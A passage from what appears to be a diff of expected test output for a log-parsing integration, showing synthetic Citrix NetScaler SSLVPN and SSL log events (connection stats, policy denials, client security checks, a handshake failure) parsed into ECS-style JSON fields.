\"2023-04-01T12:00:00Z\" - Duration 00:00:04 - Http_resources_accessed 15 - NonHttp_services_accessed 5 - Total_TCP_connections 20 - Total_UDP_flows 10 - Total_policies_allowed 25 - Total_policies_denied 5 - Total_bytes_send 1 - Total_bytes_recv 500 - Total_compressedbytes_send 700 - Total_compressedbytes_recv 350 - Compression_ratio_send 50.00% - Compression_ratio_recv 70.00% - LogoutMethod \"Timeout\" - Group(s) \"HR,Finance\"", + "severity": 0, + "start": "2023-04-01T08:00:00.000Z", + "timezone": "GMT", + "type": [ + "info" + ] + }, + "group": { + "name": "HR,Finance" + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "10.0.0.51", + "1.128.0.0", + "192.168.1.51" + ], + "user": [ + "JaneSmith" + ] + }, + "server": { + "ip": "1.128.0.0", + "port": 10443 + }, + "source": { + "bytes": 1, + "nat": { + "ip": "10.0.0.51" + } + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "user": { + "name": "JaneSmith" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN ICASTART 4471 0 : Source 192.168.1.52:5060 - Destination 1.128.0.0:80 - SSLRelayAddress 10.0.0.52:443 - customername AcmeCorp - username:domainname someusername:example.domain.com - applicationName WebMail - startTime \"2023-04-01T09:00:00Z\" - connectionId 9a8b7c", + "device_event_class_id": "SSLVPN", + "extended": { + "message": "Source 192.168.1.52:5060 - Destination 1.128.0.0:80 - SSLRelayAddress 10.0.0.52:443 - customername AcmeCorp - username:domainname someusername:example.domain.com - applicationName WebMail - startTime \"2023-04-01T09:00:00Z\" - connectionId 9a8b7c" + }, + "facility": "local0", + "host": "ns1", + "name": "ICASTART", + "priority": "info" + }, + "citrix_adc": { + "log": { + "application_name": "WebMail", + "connection_id": "9a8b7c", + "customer_name": "AcmeCorp", + "destination": { + "ip": "1.128.0.0", + "port": 80 + }, + "domain_name": "example.domain.com", + "message": "Source 192.168.1.52:5060 - Destination 1.128.0.0:80 - SSLRelayAddress 10.0.0.52:443 - customername AcmeCorp - username:domainname someusername:example.domain.com - applicationName WebMail - startTime \"2023-04-01T09:00:00Z\" - connectionId 9a8b7c", + "source": { + "ip": "192.168.1.52", + "port": 5060 + }, + "ssl_relay": { + "address": "10.0.0.52", + "port": 443 + }, + "start_time": "2023-04-01T09:00:00.000Z", + "username": "someusername" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "destination": { + "ip": "1.128.0.0", + "port": 80 + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "authentication" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN ICASTART 4471 0 : Source 192.168.1.52:5060 - Destination 1.128.0.0:80 - SSLRelayAddress 10.0.0.52:443 - customername AcmeCorp - username:domainname someusername:example.domain.com - applicationName WebMail - startTime \"2023-04-01T09:00:00Z\" - connectionId 9a8b7c", + "severity": 0, + "start": "2023-04-01T09:00:00.000Z", + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "192.168.1.52", + "1.128.0.0", + "81.2.69.144", + "10.0.0.52" + ], + "user": [ + "someusername" + ] + }, + "source": { + "ip": "192.168.1.52", + "port": 5060 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "user": { + "domain": "example.domain.com", + "name": "someusername" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN ICAEND_CONNSTAT 4471 0 : Source 192.168.1.53:22 - Destination 1.128.0.0:443 - SSLRelayAddress 10.0.0.53:443 - customername BetaInc - username:domainname someusername:example.domain.com - startTime \"2023-04-01T09:00:00Z\" - endTime \"2023-04-01T09:45:00Z\" - Duration 00:01:04 - Total_bytes_send 500000 - Total_bytes_recv 250000 - Total_compressedbytes_send 350000 - Total_compressedbytes_recv 175000 - Compression_ratio_send 50.00% - Compression_ratio_recv 70.00% - connectionId 1a2b3c", + "device_event_class_id": "SSLVPN", + "extended": { + "message": "Source 192.168.1.53:22 - Destination 1.128.0.0:443 - SSLRelayAddress 10.0.0.53:443 - customername BetaInc - username:domainname someusername:example.domain.com - startTime \"2023-04-01T09:00:00Z\" - endTime \"2023-04-01T09:45:00Z\" - Duration 00:01:04 - Total_bytes_send 500000 - Total_bytes_recv 250000 - Total_compressedbytes_send 350000 - Total_compressedbytes_recv 175000 - Compression_ratio_send 50.00% - Compression_ratio_recv 70.00% - connectionId 1a2b3c" + }, + "facility": "local0", + "host": "ns1", + "name": "ICAEND_CONNSTAT", + "priority": "info" + }, + "citrix_adc": { + "log": { + "compression_ratio_recieved": 70.0, + "compression_ratio_send": 50.0, + "connection_id": "1a2b3c", + "customer_name": "BetaInc", + "destination": { + "ip": "1.128.0.0", + "port": 443 + }, + "domain_name": "example.domain.com", + "duration": "00:01:04", + "end_time": "2023-04-01T09:45:00.000Z", + "message": "Source 192.168.1.53:22 - Destination 1.128.0.0:443 - SSLRelayAddress 10.0.0.53:443 - customername BetaInc - username:domainname someusername:example.domain.com - startTime \"2023-04-01T09:00:00Z\" - endTime \"2023-04-01T09:45:00Z\" - Duration 00:01:04 - Total_bytes_send 500000 - Total_bytes_recv 250000 - Total_compressedbytes_send 350000 - Total_compressedbytes_recv 175000 - Compression_ratio_send 50.00% - Compression_ratio_recv 70.00% - connectionId 1a2b3c", + "source": { + "ip": "192.168.1.53", + "port": 22 + }, + "ssl_relay": { + "address": "10.0.0.53", + "port": 443 + }, + "start_time": "2023-04-01T09:00:00.000Z", + "total_bytes_received": 250000, + "total_bytes_send": 500000, + "total_compressed_bytes_recieved": 175000, + "total_compressed_bytes_send": 350000, + "username": "someusername" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "destination": { + "bytes": 250000, + "ip": "1.128.0.0", + "port": 443 + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "authentication" + ], + "end": "2023-04-01T09:45:00.000Z", + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN ICAEND_CONNSTAT 4471 0 : Source 192.168.1.53:22 - Destination 1.128.0.0:443 - SSLRelayAddress 10.0.0.53:443 - customername BetaInc - username:domainname someusername:example.domain.com - startTime \"2023-04-01T09:00:00Z\" - endTime \"2023-04-01T09:45:00Z\" - Duration 00:01:04 - Total_bytes_send 500000 - Total_bytes_recv 250000 - Total_compressedbytes_send 350000 - Total_compressedbytes_recv 175000 - Compression_ratio_send 50.00% - Compression_ratio_recv 70.00% - connectionId 1a2b3c", + "severity": 0, + "start": "2023-04-01T09:00:00.000Z", + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "192.168.1.53", + "1.128.0.0", + "81.2.69.144", + "10.0.0.53" + ], + "user": [ + "someusername" + ] + }, + "source": { + "bytes": 500000, + "ip": "192.168.1.53", + "port": 22 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "user": { + "domain": "example.domain.com", + "name": "someusername" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN TCPCONNSTAT 4471 0 : User AliceCooper - Client_ip 192.168.1.54 - Nat_ip 10.0.0.54 - Vserver 1.128.0.0:20443 - Source 192.168.1.55:443 - Destination 1.128.0.0:22 - Start_time \"2023-04-01T10:00:00Z\" - End_time \"2023-04-01T11:00:00Z\" - Duration 00:02:04 - Total_bytes_send 800000 - Total_bytes_recv 400000 - Total_compressedbytes_send 560000 - Total_compressedbytes_recv 280000 - Compression_ratio_send 70.00% - Compression_ratio_recv 70.00% - Access Full - Group(s) \"Developers,QA\"", + "device_event_class_id": "SSLVPN", + "extended": { + "message": "User AliceCooper - Client_ip 192.168.1.54 - Nat_ip 10.0.0.54 - Vserver 1.128.0.0:20443 - Source 192.168.1.55:443 - Destination 1.128.0.0:22 - Start_time \"2023-04-01T10:00:00Z\" - End_time \"2023-04-01T11:00:00Z\" - Duration 00:02:04 - Total_bytes_send 800000 - Total_bytes_recv 400000 - Total_compressedbytes_send 560000 - Total_compressedbytes_recv 280000 - Compression_ratio_send 70.00% - Compression_ratio_recv 70.00% - Access Full - Group(s) \"Developers,QA\"" + }, + "facility": "local0", + "host": "ns1", + "name": "TCPCONNSTAT", + "priority": "info" + }, + "citrix_adc": { + "log": { + "access": "Full", + "client_ip": "192.168.1.54", + "compression_ratio_recieved": 70.0, + "compression_ratio_send": 70.0, + "destination": { + "ip": "1.128.0.0", + "port": 22 + }, + "duration": "00:02:04", + "end_time": "2023-04-01T11:00:00.000Z", + "groups": "Developers,QA", + "message": "User AliceCooper - Client_ip 192.168.1.54 - Nat_ip 10.0.0.54 - Vserver 1.128.0.0:20443 - Source 192.168.1.55:443 - Destination 1.128.0.0:22 - Start_time \"2023-04-01T10:00:00Z\" - End_time \"2023-04-01T11:00:00Z\" - Duration 00:02:04 - Total_bytes_send 800000 - Total_bytes_recv 400000 - Total_compressedbytes_send 560000 - Total_compressedbytes_recv 280000 - Compression_ratio_send 70.00% - Compression_ratio_recv 70.00% - Access Full - Group(s) \"Developers,QA\"", + "nat": { + "ip": "10.0.0.54" + }, + "source": { + "ip": "192.168.1.55", + "port": 443 + }, + "start_time": "2023-04-01T10:00:00.000Z", + "total_bytes_received": 400000, + "total_bytes_send": 800000, + "total_compressed_bytes_recieved": 280000, + "total_compressed_bytes_send": 560000, + "user": "AliceCooper", + "vserver": { + "ip": "1.128.0.0", + "port": 20443 + } + } + }, + "client": { + "ip": "192.168.1.54" + }, + "destination": { + "bytes": 400000, + "ip": "1.128.0.0", + "port": 22 + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "authentication" + ], + "end": "2023-04-01T11:00:00.000Z", + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN TCPCONNSTAT 4471 0 : User AliceCooper - Client_ip 192.168.1.54 - Nat_ip 10.0.0.54 - Vserver 1.128.0.0:20443 - Source 192.168.1.55:443 - Destination 1.128.0.0:22 - Start_time \"2023-04-01T10:00:00Z\" - End_time \"2023-04-01T11:00:00Z\" - Duration 00:02:04 - Total_bytes_send 800000 - Total_bytes_recv 400000 - Total_compressedbytes_send 560000 - Total_compressedbytes_recv 280000 - Compression_ratio_send 70.00% - Compression_ratio_recv 70.00% - Access Full - Group(s) \"Developers,QA\"", + "severity": 0, + "start": "2023-04-01T10:00:00.000Z", + "timezone": "GMT", + "type": [ + "info" + ] + }, + "group": { + "name": "Developers,QA" + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "192.168.1.55", + "1.128.0.0", + "10.0.0.54", + "192.168.1.54" + ], + "user": [ + "AliceCooper" + ] + }, + "server": { + "ip": "1.128.0.0", + "port": 20443 + }, + "source": { + "bytes": 800000, + "ip": "192.168.1.55", + "nat": { + "ip": "10.0.0.54" + }, + "port": 443 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "user": { + "name": "AliceCooper" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN TCPCONN_TIMEDOUT 4471 0 : User CharlieBrown - Client_ip 192.168.1.56 - Nat_ip 10.0.0.56 - Vserver 1.128.0.0:10443 - Last_contact \"2023-04-01T13:00:00Z\" - Group(s) \"Sales,Marketing\"", + "device_event_class_id": "SSLVPN", + "extended": { + "message": "User CharlieBrown - Client_ip 192.168.1.56 - Nat_ip 10.0.0.56 - Vserver 1.128.0.0:10443 - Last_contact \"2023-04-01T13:00:00Z\" - Group(s) \"Sales,Marketing\"" + }, + "facility": "local0", + "host": "ns1", + "name": "TCPCONN_TIMEDOUT", + "priority": "info" + }, + "citrix_adc": { + "log": { + "client_ip": "192.168.1.56", + "groups": "Sales,Marketing", + "last_contact": "2023-04-01T13:00:00Z", + "message": "User CharlieBrown - Client_ip 192.168.1.56 - Nat_ip 10.0.0.56 - Vserver 1.128.0.0:10443 - Last_contact \"2023-04-01T13:00:00Z\" - Group(s) \"Sales,Marketing\"", + "nat": { + "ip": "10.0.0.56" + }, + "user": "CharlieBrown", + "vserver": { + "ip": "1.128.0.0", + "port": 10443 + } + } + }, + "client": { + "ip": "192.168.1.56" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "authentication" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN TCPCONN_TIMEDOUT 4471 0 : User CharlieBrown - Client_ip 192.168.1.56 - Nat_ip 10.0.0.56 - Vserver 1.128.0.0:10443 - Last_contact \"2023-04-01T13:00:00Z\" - Group(s) \"Sales,Marketing\"", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "group": { + "name": "Sales,Marketing" + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "10.0.0.56", + "1.128.0.0", + "192.168.1.56" + ], + "user": [ + "CharlieBrown" + ] + }, + "server": { + "ip": "1.128.0.0", + "port": 10443 + }, + "source": { + "nat": { + "ip": "10.0.0.56" + } + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "user": { + "name": "CharlieBrown" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN UDPFLOWSTAT 4471 0 : User DianaPrince - Client_ip 192.168.1.57 - Nat_ip 10.0.0.57 - Vserver 1.128.0.0:443 - Source 192.168.1.58:3389 - Destination 1.128.0.0:22 - Start_time \"2023-04-01T14:00:00Z\" - End_time \"2023-04-01T15:00:00Z\" - Duration 00:03:04 - Total_bytes_send 1200000 - Total_bytes_recv 600000 - Access RemoteDesktop - Group(s) \"Management,Executives\"", + "device_event_class_id": "SSLVPN", + "extended": { + "message": "User DianaPrince - Client_ip 192.168.1.57 - Nat_ip 10.0.0.57 - Vserver 1.128.0.0:443 - Source 192.168.1.58:3389 - Destination 1.128.0.0:22 - Start_time \"2023-04-01T14:00:00Z\" - End_time \"2023-04-01T15:00:00Z\" - Duration 00:03:04 - Total_bytes_send 1200000 - Total_bytes_recv 600000 - Access RemoteDesktop - Group(s) \"Management,Executives\"" + }, + "facility": "local0", + "host": "ns1", + "name": "UDPFLOWSTAT", + "priority": "info" + }, + "citrix_adc": { + "log": { + "access": "RemoteDesktop", + "client_ip": "192.168.1.57", + "destination": { + "ip": "1.128.0.0", + "port": 22 + }, + "duration": "00:03:04", + "end_time": "2023-04-01T15:00:00.000Z", + "groups": "Management,Executives", + "message": "User DianaPrince - Client_ip 192.168.1.57 - Nat_ip 10.0.0.57 - Vserver 1.128.0.0:443 - Source 192.168.1.58:3389 - Destination 1.128.0.0:22 - Start_time \"2023-04-01T14:00:00Z\" - End_time \"2023-04-01T15:00:00Z\" - Duration 00:03:04 - Total_bytes_send 1200000 - Total_bytes_recv 600000 - Access RemoteDesktop - Group(s) \"Management,Executives\"", + "nat": { + "ip": "10.0.0.57" + }, + "source": { + "ip": "192.168.1.58", + "port": 3389 + }, + "start_time": "2023-04-01T14:00:00.000Z", + "total_bytes_received": 600000, + "total_bytes_send": 1200000, + "user": "DianaPrince", + "vserver": { + "ip": "1.128.0.0", + "port": 443 + } + } + }, + "client": { + "ip": "192.168.1.57" + }, + "destination": { + "bytes": 600000, + "ip": "1.128.0.0", + "port": 22 + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "authentication" + ], + "end": "2023-04-01T15:00:00.000Z", + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN UDPFLOWSTAT 4471 0 : User DianaPrince - Client_ip 192.168.1.57 - Nat_ip 10.0.0.57 - Vserver 1.128.0.0:443 - Source 192.168.1.58:3389 - Destination 1.128.0.0:22 - Start_time \"2023-04-01T14:00:00Z\" - End_time \"2023-04-01T15:00:00Z\" - Duration 00:03:04 - Total_bytes_send 1200000 - Total_bytes_recv 600000 - Access RemoteDesktop - Group(s) \"Management,Executives\"", + "severity": 0, + "start": "2023-04-01T14:00:00.000Z", + "timezone": "GMT", + "type": [ + "info" + ] + }, + "group": { + "name": "Management,Executives" + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "192.168.1.58", + "1.128.0.0", + "10.0.0.57", + "192.168.1.57" + ], + "user": [ + "DianaPrince" + ] + }, + "server": { + "ip": "1.128.0.0", + "port": 443 + }, + "source": { + "bytes": 1200000, + "ip": "192.168.1.58", + "nat": { + "ip": "10.0.0.57" + }, + "port": 3389 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "user": { + "name": "DianaPrince" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN NONHTTP_RESOURCEACCESS_DENIED 4471 0 : - Denied_by_policy \"SecurityPolicy\"", + "device_event_class_id": "SSLVPN", + "extended": { + "message": "- Denied_by_policy \"SecurityPolicy\"" + }, + "facility": "local0", + "host": "ns1", + "name": "NONHTTP_RESOURCEACCESS_DENIED", + "priority": "info" + }, + "citrix_adc": { + "log": { + "message": "- Denied_by_policy \"SecurityPolicy\"", + "policy_violation": "SecurityPolicy" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "authentication" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN NONHTTP_RESOURCEACCESS_DENIED 4471 0 : - Denied_by_policy \"SecurityPolicy\"", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN HTTP_RESOURCEACCESS_DENIED 4471 0 : - Denied_by_policy \"UnauthorizedAccessAttempt\"", + "device_event_class_id": "SSLVPN", + "extended": { + "message": "- Denied_by_policy \"UnauthorizedAccessAttempt\"" + }, + "facility": "local0", + "host": "ns1", + "name": "HTTP_RESOURCEACCESS_DENIED", + "priority": "info" + }, + "citrix_adc": { + "log": { + "message": "- Denied_by_policy \"UnauthorizedAccessAttempt\"", + "policy_violation": "UnauthorizedAccessAttempt" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "authentication" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN HTTP_RESOURCEACCESS_DENIED 4471 0 : - Denied_by_policy \"UnauthorizedAccessAttempt\"", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN LICLMT_REACHED 4471 0 : Vserver 1.128.0.0:443 - License_limit 500", + "device_event_class_id": "SSLVPN", + "extended": { + "message": "Vserver 1.128.0.0:443 - License_limit 500" + }, + "facility": "local0", + "host": "ns1", + "name": "LICLMT_REACHED", + "priority": "info" + }, + "citrix_adc": { + "log": { + "license_limit": 500, + "message": "Vserver 1.128.0.0:443 - License_limit 500", + "vserver": { + "ip": "1.128.0.0", + "port": 443 + } + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "authentication" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN LICLMT_REACHED 4471 0 : Vserver 1.128.0.0:443 - License_limit 500", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "1.128.0.0", + "81.2.69.144" + ] + }, + "server": { + "ip": "1.128.0.0", + "port": 443 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN CLISEC_CHECK 4471 0 : Alert: High - ClientIP 192.168.1.100 - Vserver 1.128.0.0:443 - Client_security_expression \"geoLocationBlocked\" -", + "device_event_class_id": "SSLVPN", + "extended": { + "message": "Alert: High - ClientIP 192.168.1.100 - Vserver 1.128.0.0:443 - Client_security_expression \"geoLocationBlocked\" -" + }, + "facility": "local0", + "host": "ns1", + "name": "CLISEC_CHECK", + "priority": "info" + }, + "citrix_adc": { + "log": { + "client_ip": "192.168.1.100", + "client_security_expression": "geoLocationBlocked", + "message": "Alert: High - ClientIP 192.168.1.100 - Vserver 1.128.0.0:443 - Client_security_expression \"geoLocationBlocked\" -", + "vserver": { + "ip": "1.128.0.0", + "port": 443 + } + } + }, + "client": { + "ip": "192.168.1.100" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "authentication" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN CLISEC_CHECK 4471 0 : Alert: High - ClientIP 192.168.1.100 - Vserver 1.128.0.0:443 - Client_security_expression \"geoLocationBlocked\" -", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "1.128.0.0", + "192.168.1.100" + ] + }, + "server": { + "ip": "1.128.0.0", + "port": 443 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN CLISEC_EXP_EVAL 4471 0 : User ClarkKent :- Client IP 192.168.1.101 - Vserver 1.128.0.0:443 - ClientsecuritycheckPassed(200)ontheclientmachine", + "device_event_class_id": "SSLVPN", + "extended": { + "message": "User ClarkKent :- Client IP 192.168.1.101 - Vserver 1.128.0.0:443 - ClientsecuritycheckPassed(200)ontheclientmachine" + }, + "facility": "local0", + "host": "ns1", + "name": "CLISEC_EXP_EVAL", + "priority": "info" + }, + "citrix_adc": { + "log": { + "client_ip": "192.168.1.101", + "client_security_check_status": "200", + "message": "User ClarkKent :- Client IP 192.168.1.101 - Vserver 1.128.0.0:443 - ClientsecuritycheckPassed(200)ontheclientmachine", + "user": "ClarkKent", + "vserver": { + "ip": "1.128.0.0", + "port": 443 + } + } + }, + "client": { + "ip": "192.168.1.101" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "authentication" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN CLISEC_EXP_EVAL 4471 0 : User ClarkKent :- Client IP 192.168.1.101 - Vserver 1.128.0.0:443 - ClientsecuritycheckPassed(200)ontheclientmachine", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "1.128.0.0", + "192.168.1.101" + ], + "user": [ + "ClarkKent" + ] + }, + "server": { + "ip": "1.128.0.0", + "port": 443 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "user": { + "name": "ClarkKent" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN STA_VALIDATE_RESP 4471 0 : Xdatalen 1024 - Xdata PayloadWithSensitiveInformation", + "device_event_class_id": "SSLVPN", + "extended": { + "message": "Xdatalen 1024 - Xdata PayloadWithSensitiveInformation" + }, + "facility": "local0", + "host": "ns1", + "name": "STA_VALIDATE_RESP", + "priority": "info" + }, + "citrix_adc": { + "log": { + "data": "PayloadWithSensitiveInformation", + "data_length": 1024, + "message": "Xdatalen 1024 - Xdata PayloadWithSensitiveInformation" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "authentication" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLVPN STA_VALIDATE_RESP 4471 0 : Xdatalen 1024 - Xdata PayloadWithSensitiveInformation", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ] + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_HANDSHAKE_FAILURE 4471 0 : Backend SPCBId 128 - ServerIP 1.128.0.0 - ServerPort 443 - ProtocolVersion TLS1.2 - CipherSuite \"ECDHE-RSA-AES256-GCM-SHA384\" - Session 0x12a7bf", + "device_event_class_id": "SSLLOG", + "extended": { + "message": "Backend SPCBId 128 - ServerIP 1.128.0.0 - ServerPort 443 - ProtocolVersion TLS1.2 - CipherSuite \"ECDHE-RSA-AES256-GCM-SHA384\" - Session 0x12a7bf" + }, + "facility": "local0", + "host": "ns1", + "name": "SSL_HANDSHAKE_FAILURE", + "priority": "info" + }, + "citrix_adc": { + "log": { + "cipher_suite": "ECDHE-RSA-AES256-GCM-SHA384", + "message": "Backend SPCBId 128 - ServerIP 1.128.0.0 - ServerPort 443 - ProtocolVersion TLS1.2 - CipherSuite \"ECDHE-RSA-AES256-GCM-SHA384\" - Session 0x12a7bf", + "protocol_version": "TLS1.2", + "server": { + "ip": "1.128.0.0", + "port": 443 + }, + "session": "0x12a7bf", + "spcb_id": "128" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : SSLLOG SSL_HANDSHAKE_FAILURE 4471 0 : Backend SPCBId 128 - ServerIP 1.128.0.0 - ServerPort 443 - ProtocolVersion TLS1.2 - CipherSuite \"ECDHE-RSA-AES256-GCM-SHA384\" - Session 0x12a7bf", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "1.128.0.0", + "81.2.69.144" + ] + }, + "source": { + "as": { + "number": 1221, + 